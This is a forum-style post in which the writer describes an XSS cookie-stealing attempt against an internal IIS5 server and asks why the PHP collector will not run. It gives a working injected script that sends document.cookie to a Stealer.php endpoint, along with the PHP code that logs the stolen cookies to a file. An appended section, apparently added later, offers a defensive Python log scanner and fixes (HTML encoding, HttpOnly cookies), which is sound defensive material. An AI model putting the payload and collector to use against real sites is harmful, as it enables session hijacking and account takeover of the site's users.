Dear friend,


I am playing with cookie stealing (XSS) against an IIS5 server on an internal network.

Injecting this code in forum mail:


hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>


When I log out and log in again as a new user, I get the PHP popping up, asking do I want to open it with Notepad.

Can you load PHP files on IIS? Everything on the server is ASP ...

BELOW IS SCRIPT

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie . "\n");
fclose($steal);
?>
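
A defender-side check for the request pattern described in the post, as an added example that is not part of the original post: it scans IIS W3C extended logs for query strings that decode to script markup and marks the ones that read document.cookie. The log lines, addresses, the /collect path and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in IIS W3C extended log format (not taken from the post).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:15:02 10.0.0.21 GET /login.asp search=printer+drivers 200
2004-03-01 10:15:40 10.0.0.22 GET /login.asp search=%3Cscript%3Elocation.href+%3D+%27http%3A%2F%2F10.0.0.99%2Fcollect%3Fc%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E 200
2004-03-01 10:16:05 10.0.0.23 GET /login.asp search=%253Cscript%253Ealert(1)%253C%252Fscript%253E 200
2004-03-01 10:17:11 10.0.0.24 GET /default.asp - 200
"""

# Markup that has no business in a search parameter.
MARKUP = re.compile(r"<\s*script\b|<[^>]+\bon\w+\s*=|javascript:", re.I)
# Script that reads the session cookie, as in the request quoted in the post.
COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded markup is not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return (client_ip, uri_stem, severity) for each suspicious request."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        query = decode_fully(row.get("cs-uri-query", "-"))
        if MARKUP.search(query):
            severity = "cookie-exfil" if COOKIE_READ.search(query) else "markup"
            findings.append((row["c-ip"], row["cs-uri-stem"], severity))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on a page that echoes the parameter back means the output needs HTML encoding (classic ASP provides Server.HTMLEncode), and marking the session cookie HttpOnly keeps it out of reach of document.cookie.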